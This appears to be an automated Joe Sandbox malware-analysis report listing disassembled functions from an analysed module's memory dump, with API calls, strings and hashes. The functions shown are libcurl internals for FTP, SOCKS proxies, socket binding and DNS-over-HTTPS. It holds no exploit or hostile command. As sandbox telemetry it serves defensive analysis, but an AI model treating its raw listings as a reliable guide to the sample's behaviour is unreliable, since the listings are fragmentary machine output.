                                                                                                                                  • Opcode ID: 635b81982939b7aa517aa9a80ec2f524593ae58b232834d4c33686d276a1fd00
                                                                                                                                  • Instruction ID: 84f98f29113028db1afbb6bc84ff1bd5bf36c3dd0ee661e6de23d2355596ae91
                                                                                                                                  • Opcode Fuzzy Hash: 635b81982939b7aa517aa9a80ec2f524593ae58b232834d4c33686d276a1fd00
                                                                                                                                  • Instruction Fuzzy Hash: 8EF20675E04619ABEB118B34CC41BDAB7B5BF06308F0045E9E81CA7242E779E995CFB1
                                                                                                                                  Function 6B8DEEA0 Relevance: 63.7, APIs: 23, Strings: 13, Instructions: 663networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8DEFA1
                                                                                                                                  • _strncpy.LIBCMT ref: 6B8DEFC7
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8DEFE8
                                                                                                                                  • inet_pton.WS2_32(00000017,?,?), ref: 6B8DF006
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8DF078
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8DF0A9
                                                                                                                                  • curl_pushheader_bynum.LIBCURL(?,00000000,00000401), ref: 6B8DF135
                                                                                                                                  • getsockname.WS2_32(?,?,?), ref: 6B8DF1CC
                                                                                                                                  • WSAGetLastError.WS2_32(?,00000100), ref: 6B8DF1E2
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8DF2ED
                                                                                                                                  • bind.WS2_32(FFFFFFFF,00000017,00000080), ref: 6B8DF396
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8DF3A4
                                                                                                                                  • getsockname.WS2_32(?,00000017,00000080), ref: 6B8DF407
                                                                                                                                  • WSAGetLastError.WS2_32(?,00000100), ref: 6B8DF452
                                                                                                                                    • Part of subcall function 6B90A0E0: GetLastError.KERNEL32(?,?,00000100), ref: 6B90A0E7
                                                                                                                                    • Part of subcall function 6B9005D0: curl_mvsnprintf.LIBCURL(?,00000100,6B8FC830,?), ref: 6B900610
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$___from_strstr_to_strchr$getsockname$_strncpybindcurl_mvsnprintfcurl_pushheader_bynuminet_pton
                                                                                                                                  • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports!$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                                                                                                                  • API String ID: 1437543408-2383553807
                                                                                                                                  • Opcode ID: 4cbb643a3f299ec0eec4fff7a16c45883ae3b8c4b87cc4e624573230a98e77a4
                                                                                                                                  • Instruction ID: 61340e39c4d90db268be3b6bd9d646a83cabbd9e708e7166d6101ac1712e6219
                                                                                                                                  • Opcode Fuzzy Hash: 4cbb643a3f299ec0eec4fff7a16c45883ae3b8c4b87cc4e624573230a98e77a4
                                                                                                                                  • Instruction Fuzzy Hash: 1032C671D4452DABDF209F34CC41BEEB7BAAF55304F0445EAE849A3140DB3ADA919FA0
                                                                                                                                  Function 6B9075D0 Relevance: 56.9, APIs: 1, Strings: 31, Instructions: 939COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  • SOCKS5 GSS-API protection not yet implemented., xrefs: 6B90802E
                                                                                                                                  • Unable to send initial SOCKS5 request., xrefs: 6B9078B0
                                                                                                                                  • SOCKS5 request granted., xrefs: 6B908259
                                                                                                                                  • SOCKS5 GSSAPI per-message authentication is not supported., xrefs: 6B907A2F
                                                                                                                                  • SOCKS5 connect to IPv6 %s (locally resolved), xrefs: 6B907EB5
                                                                                                                                  • Unable to receive initial SOCKS5 response., xrefs: 6B907861
                                                                                                                                  • Connection to proxy closed, xrefs: 6B90790D
                                                                                                                                  • Failed to send SOCKS5 sub-negotiation request., xrefs: 6B907BA7
                                                                                                                                  • Excessive user name length for proxy auth, xrefs: 6B907AC3
                                                                                                                                  • Failed to resolve "%s" for SOCKS5 connect., xrefs: 6B907F06
                                                                                                                                  • Failed to send SOCKS5 connect request., xrefs: 6B907FED
                                                                                                                                  • Unable to receive SOCKS5 sub-negotiation response., xrefs: 6B907C2C
                                                                                                                                  • unknown, xrefs: 6B90760C
                                                                                                                                  • :%d, xrefs: 6B907D63
                                                                                                                                  • connection to proxy closed, xrefs: 6B90821A
                                                                                                                                  • SOCKS5 connection to %s not supported, xrefs: 6B907EDE
                                                                                                                                  • Undocumented SOCKS5 mode attempted to be used by server., xrefs: 6B907A7B
                                                                                                                                  • warning: unsupported value passed to CURLOPT_SOCKS5_AUTH: %lu, xrefs: 6B907737
                                                                                                                                  • Failed to receive SOCKS5 connect request ack., xrefs: 6B90809F, 6B9081CE
                                                                                                                                  • SOCKS5: connecting to HTTP proxy %s port %d, xrefs: 6B9076ED
                                                                                                                                  • Can't complete SOCKS5 connection to %s. (%d), xrefs: 6B908118
                                                                                                                                  • User was rejected by the SOCKS5 server (%d %d)., xrefs: 6B907C75
                                                                                                                                  • SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=%zu], xrefs: 6B907712
                                                                                                                                  • Excessive password length for proxy auth, xrefs: 6B907B23
                                                                                                                                  • No authentication method was acceptable., xrefs: 6B907A57
                                                                                                                                  • SOCKS5 reply has wrong version, version should be 5., xrefs: 6B9080DE
                                                                                                                                  • SOCKS5 reply has wrong address type., xrefs: 6B9081F2
                                                                                                                                  • Received invalid version in initial SOCKS5 response., xrefs: 6B907940
                                                                                                                                  • SOCKS5 connect to IPv4 %s (locally resolved), xrefs: 6B907DD3
                                                                                                                                  • SOCKS5 connect to %s:%d (remotely resolved), xrefs: 6B907F70
                                                                                                                                  • Unable to negotiate SOCKS5 GSS-API context., xrefs: 6B907A0B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_mvsnprintf$curl_msnprintf
                                                                                                                                  • String ID: :%d$Can't complete SOCKS5 connection to %s. (%d)$Connection to proxy closed$Excessive password length for proxy auth$Excessive user name length for proxy auth$Failed to receive SOCKS5 connect request ack.$Failed to resolve "%s" for SOCKS5 connect.$Failed to send SOCKS5 connect request.$Failed to send SOCKS5 sub-negotiation request.$No authentication method was acceptable.$Received invalid version in initial SOCKS5 response.$SOCKS5 GSS-API protection not yet implemented.$SOCKS5 GSSAPI per-message authentication is not supported.$SOCKS5 connect to %s:%d (remotely resolved)$SOCKS5 connect to IPv4 %s (locally resolved)$SOCKS5 connect to IPv6 %s (locally resolved)$SOCKS5 connection to %s not supported$SOCKS5 reply has wrong address type.$SOCKS5 reply has wrong version, version should be 5.$SOCKS5 request granted.$SOCKS5: connecting to HTTP proxy %s port %d$SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=%zu]$Unable to negotiate SOCKS5 GSS-API context.$Unable to receive SOCKS5 sub-negotiation response.$Unable to receive initial SOCKS5 response.$Unable to send initial SOCKS5 request.$Undocumented SOCKS5 mode attempted to be used by server.$User was rejected by the SOCKS5 server (%d %d).$connection to proxy closed$unknown$warning: unsupported value passed to CURLOPT_SOCKS5_AUTH: %lu
                                                                                                                                  • API String ID: 2260702874-704893380
                                                                                                                                  • Opcode ID: 4a46837cb7bf10bec7b869433506ca855dfacf4046d1e419168b83d601384954
                                                                                                                                  • Instruction ID: b39d9c27c552b45563b718dc5aea21f726707e8623a6f3d9efef2169a176017d
                                                                                                                                  • Opcode Fuzzy Hash: 4a46837cb7bf10bec7b869433506ca855dfacf4046d1e419168b83d601384954
                                                                                                                                  • Instruction Fuzzy Hash: 8562F371A042189BDB25CF28DC817EEBBB5EF56318F0040EED84E97241DB3AD994DB61
                                                                                                                                  Function 6B8D39A0 Relevance: 37.1, APIs: 13, Strings: 8, Instructions: 395networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_pushheader_bynum.LIBCURL(?,?,?,?,?,00000100,?,?,?,?,?,?,?,?,?,?), ref: 6B8D3AC2
                                                                                                                                  • inet_pton.WS2_32(00000017,?,?), ref: 6B8D3BA2
                                                                                                                                  • htons.WS2_32(?), ref: 6B8D3BB9
                                                                                                                                  • inet_pton.WS2_32(00000002,?,?), ref: 6B8D3CED
                                                                                                                                  • htons.WS2_32(?), ref: 6B8D3D08
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  • bind.WS2_32(?,?,00000000), ref: 6B8D3DAF
                                                                                                                                  • htons.WS2_32(?), ref: 6B8D3DE9
                                                                                                                                  • bind.WS2_32(?,?,00000000), ref: 6B8D3E02
                                                                                                                                  • getsockname.WS2_32(?,?,00000080), ref: 6B8D3E3D
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D3E4B
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D3E91
                                                                                                                                  Strings
                                                                                                                                  • Couldn't bind to '%s', xrefs: 6B8D3D26
                                                                                                                                  • Couldn't bind to interface '%s', xrefs: 6B8D3BE4
                                                                                                                                  • Local port: %hu, xrefs: 6B8D3EDB
                                                                                                                                  • Bind to local port %hu failed, trying next, xrefs: 6B8D3DD9
                                                                                                                                  • getsockname() failed with errno %d: %s, xrefs: 6B8D3E6D
                                                                                                                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 6B8D3C90
                                                                                                                                  • Local Interface %s is ip %s using address family %i, xrefs: 6B8D3B78
                                                                                                                                  • bind failed with errno %d: %s, xrefs: 6B8D3EB3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htons$ErrorLastbindinet_pton$curl_msnprintfcurl_mvsnprintfcurl_pushheader_bynumgetsockname
                                                                                                                                  • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s
                                                                                                                                  • API String ID: 2165106075-2769131373
                                                                                                                                  • Opcode ID: e5ee8dc82562d6822aa3ab6fd6d74a8db0a1221160218cc1904ec149faaa595c
                                                                                                                                  • Instruction ID: a3a042c5d6a6efa7f4cf2d964fbe6897c684f83137578f3470007a97ae219b80
                                                                                                                                  • Opcode Fuzzy Hash: e5ee8dc82562d6822aa3ab6fd6d74a8db0a1221160218cc1904ec149faaa595c
                                                                                                                                  • Instruction Fuzzy Hash: D8E1B075A04119AFDB20DF24CC89BEA77B8EF16348F0045EAE90DD7241EB399E459F60
                                                                                                                                  Function 6B906F40 Relevance: 33.8, APIs: 1, Strings: 18, Instructions: 550COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  • connection to proxy closed, xrefs: 6B9073BA
                                                                                                                                  • SOCKS4%s request granted., xrefs: 6B90744B
                                                                                                                                  • Hostname '%s' was found, xrefs: 6B907113
                                                                                                                                  • SOCKS4 reply has wrong version, version should be 0., xrefs: 6B907403
                                                                                                                                  • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client., xrefs: 6B9074DC
                                                                                                                                  • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown., xrefs: 6B90756A
                                                                                                                                  • Failed to send SOCKS4 connect request., xrefs: 6B9072D1
                                                                                                                                  • SOCKS4: Failed receiving connect request ack: %s, xrefs: 6B907392
                                                                                                                                  • SOCKS4 connect to IPv4 %s (locally resolved), xrefs: 6B907188
                                                                                                                                  • SOCKS4: too long host name, xrefs: 6B9072F5
                                                                                                                                  • Too long SOCKS proxy user name, can't use!, xrefs: 6B9070C9
                                                                                                                                  • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed., xrefs: 6B907495
                                                                                                                                  • SOCKS4 non-blocking resolve of %s, xrefs: 6B907064
                                                                                                                                  • SOCKS4%s: connecting to HTTP proxy %s port %d, xrefs: 6B906FF6
                                                                                                                                  • SOCKS4 communication to %s:%d, xrefs: 6B90700A
                                                                                                                                  • Failed to resolve "%s" for SOCKS4 connect., xrefs: 6B9071FD
                                                                                                                                  • SOCKS4 connection to %s not supported, xrefs: 6B9071D6
                                                                                                                                  • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids., xrefs: 6B907523
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_mvsnprintf
                                                                                                                                  • String ID: Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$Hostname '%s' was found$SOCKS4 communication to %s:%d$SOCKS4 connect to IPv4 %s (locally resolved)$SOCKS4 connection to %s not supported$SOCKS4 non-blocking resolve of %s$SOCKS4 reply has wrong version, version should be 0.$SOCKS4%s request granted.$SOCKS4%s: connecting to HTTP proxy %s port %d$SOCKS4: Failed receiving connect request ack: %s$SOCKS4: too long host name$Too long SOCKS proxy user name, can't use!$connection to proxy closed
                                                                                                                                  • API String ID: 3418963191-1991471026
                                                                                                                                  • Opcode ID: f25b1a98523d9fb3b5aa077235980aa6498fdea8ed1e302a093094b333534229
                                                                                                                                  • Instruction ID: 055e79df840631986c1f95aacfb6465c27ac92f8c2294ecdd1786c57005b5ef1
                                                                                                                                  • Opcode Fuzzy Hash: f25b1a98523d9fb3b5aa077235980aa6498fdea8ed1e302a093094b333534229
                                                                                                                                  • Instruction Fuzzy Hash: F1120571A042089FDB10CFB89851BBEFBF9EF55318F0481AEE85A96281DB3DE514C760
                                                                                                                                  Function 6B8E3A10 Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 449COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_getenv.LIBCURL(NO_PROXY,00000000), ref: 6B8E3B74
                                                                                                                                    • Part of subcall function 6B8E4770: curl_url.LIBCURL(00000000,00000000,6B8E2F71), ref: 6B8E478E
                                                                                                                                    • Part of subcall function 6B8E4770: curl_url_set.LIBCURL(00000000,00000000,00000000,00000208,00000000,00000000,6B8E2F71), ref: 6B8E47A6
                                                                                                                                    • Part of subcall function 6B8E4770: curl_url_get.LIBCURL(6B8E2F71,00000001,00000000,00000000,?,00000000,00000000,6B8E2F71), ref: 6B8E47C0
                                                                                                                                    • Part of subcall function 6B8E4770: curl_url_cleanup.LIBCURL(6B8E2F71,?,?,?,?,00000000,00000000,6B8E2F71), ref: 6B8E4A84
                                                                                                                                  • curl_getenv.LIBCURL(no_proxy), ref: 6B8E3B5C
                                                                                                                                    • Part of subcall function 6B8E6310: GetEnvironmentVariableA.KERNEL32(?,00000000,00000001), ref: 6B8E633A
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E3BF7
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E3C4D
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E3C80
                                                                                                                                  • curl_getenv.LIBCURL(?), ref: 6B8E3D7B
                                                                                                                                  • curl_getenv.LIBCURL(?,?,?,00000080,?,?,00000000), ref: 6B8E3DC0
                                                                                                                                  • curl_getenv.LIBCURL(all_proxy,00000000), ref: 6B8E3DE0
                                                                                                                                  • curl_getenv.LIBCURL(ALL_PROXY,?,00000000), ref: 6B8E3DFA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_getenv$___from_strstr_to_strchr$EnvironmentVariablecurl_urlcurl_url_cleanupcurl_url_getcurl_url_set
                                                                                                                                  • String ID: ALL_PROXY$NO_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy$memory shortage$no_proxy
                                                                                                                                  • API String ID: 3877414117-1021110354
                                                                                                                                  • Opcode ID: 5ba806d95e6ed1c3da3819204bc50d2b018e04b91f9c4d614ad1cf2d047eaf6d
                                                                                                                                  • Instruction ID: b54e90d8856ff3e0bb8f9cf02c7ce9eb971a4c5e7f6bb94e4697892d90b7f96d
                                                                                                                                  • Opcode Fuzzy Hash: 5ba806d95e6ed1c3da3819204bc50d2b018e04b91f9c4d614ad1cf2d047eaf6d
                                                                                                                                  • Instruction Fuzzy Hash: AB02B475D046659BDF228F248C41B9A7BB4AF43704F0844E9DC4CAB212DB399E86CFB1
                                                                                                                                  Function 6B90AE50 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 164libraryloadernetworkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 6B90AE75
                                                                                                                                  • WSACleanup.WS2_32 ref: 6B90AE90
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,?,?), ref: 6B90AEBF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6B90AEDD
                                                                                                                                  • _strpbrk.LIBCMT ref: 6B90AEEF
                                                                                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll,?,?), ref: 6B90AF16
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 6B90AF2D
                                                                                                                                  • GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 6B90AF50
                                                                                                                                  • GetSystemDirectoryA.KERNEL32(00000000,?), ref: 6B90AF7E
                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?), ref: 6B90AFDB
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 6B90AFFE
                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(6B953B50,?,?,?,?,?,?), ref: 6B90B033
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$DirectoryLibraryLoadSystem$CleanupFrequencyHandleModulePerformanceQueryStartup_strpbrk
                                                                                                                                  • String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
                                                                                                                                  • API String ID: 945793807-2794540096
                                                                                                                                  • Opcode ID: 7f1fd6d46fd02ddcfb91c841bcb4f20df6523fd6434815af444582d422105b27
                                                                                                                                  • Instruction ID: ac98e4b7edf73b2050799d98a9f11b2d7ded8e8304dc23d3eaf3e6ac4cffb167
                                                                                                                                  • Opcode Fuzzy Hash: 7f1fd6d46fd02ddcfb91c841bcb4f20df6523fd6434815af444582d422105b27
                                                                                                                                  • Instruction Fuzzy Hash: D251397164C601BBEB219B748C49B697BB9AF97704F2041FCED0A9B241EF38C505DBA0
                                                                                                                                  Function 6B8FDCD0 Relevance: 26.7, APIs: 4, Strings: 11, Instructions: 417COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_multi_remove_handle.LIBCURL(?,?,?,00000000,00000000), ref: 6B8FDD78
                                                                                                                                    • Part of subcall function 6B9005D0: curl_mvsnprintf.LIBCURL(?,00000100,6B8FC830,?), ref: 6B900610
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_multi_remove_handlecurl_mvsnprintf
                                                                                                                                  • String ID: %s$%s%02x%02x$AAAA$CNAME: %s$Could not DOH-resolve: %s$DOH A: %u.%u.%u.%u$DOH AAAA: $DOH Host name: %s$DOH: %s type %s for %s$TTL: %u seconds$bad error code
                                                                                                                                  • API String ID: 262101408-4053692942
                                                                                                                                  • Opcode ID: a05440530ac5f5091dea78b6299a32414a315fafdeec800615f98f1a746a284b
                                                                                                                                  • Instruction ID: 6d5494f9680b160c897cc5b528c4279af5bbf221df6da1b726b9fab16be66877
                                                                                                                                  • Opcode Fuzzy Hash: a05440530ac5f5091dea78b6299a32414a315fafdeec800615f98f1a746a284b
                                                                                                                                  • Instruction Fuzzy Hash: ADF1CF71D002299FEB20DF24CC85BAEB7B9FF59344F0045E9D94CA7242DB399A858F90
                                                                                                                                  Function 6B910A40 Relevance: 19.7, APIs: 5, Strings: 6, Instructions: 455COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %%25%s]$%ld$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$file$file://%s%s%s$https
                                                                                                                                  • API String ID: 0-1832275178
                                                                                                                                  • Opcode ID: 53c0f0b5f619e15c602cca90a31a098fa80d36e9ba6b827a10a2a50888d8ba11
                                                                                                                                  • Instruction ID: 9dc3c8a6b23125ad09c7b8424845f26ff931659c3609dbb0cbf5caea9a1c0ac9
                                                                                                                                  • Opcode Fuzzy Hash: 53c0f0b5f619e15c602cca90a31a098fa80d36e9ba6b827a10a2a50888d8ba11
                                                                                                                                  • Instruction Fuzzy Hash: 9CF1FF75A0870D9FDF10CF68D8417AAB7FAEF49354F0085A9E859A7340D73AEC209B61
                                                                                                                                  Function 6B8DF950 Relevance: 14.3, Strings: 11, Instructions: 519COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ACCT rejected by server: %03d$AUTH %s$CCC$Entry path is '%s'$Failed to clear the command channel (CCC)$Failed to figure out path$Got a %03d ftp-server response when 220 was expected$PROT %c$SYST$We got a 421 - timeout!$unsupported parameter to CURLOPT_FTPSSLAUTH: %d
                                                                                                                                  • API String ID: 0-547999808
                                                                                                                                  • Opcode ID: b0d8ca8827f26be8bb9de48b946904abf01db32553b1e5bfedfc372e0c623a5c
                                                                                                                                  • Instruction ID: 22b31ab5936e6e7d249156b7d9ffe473a987ef552b47bfc0d161dfead4cbd5e7
                                                                                                                                  • Opcode Fuzzy Hash: b0d8ca8827f26be8bb9de48b946904abf01db32553b1e5bfedfc372e0c623a5c
                                                                                                                                  • Instruction Fuzzy Hash: 21F11475B042189FDB10CF38D8517AEB3B2EF95319F1005FAD80E8B241DB3A9D459B91
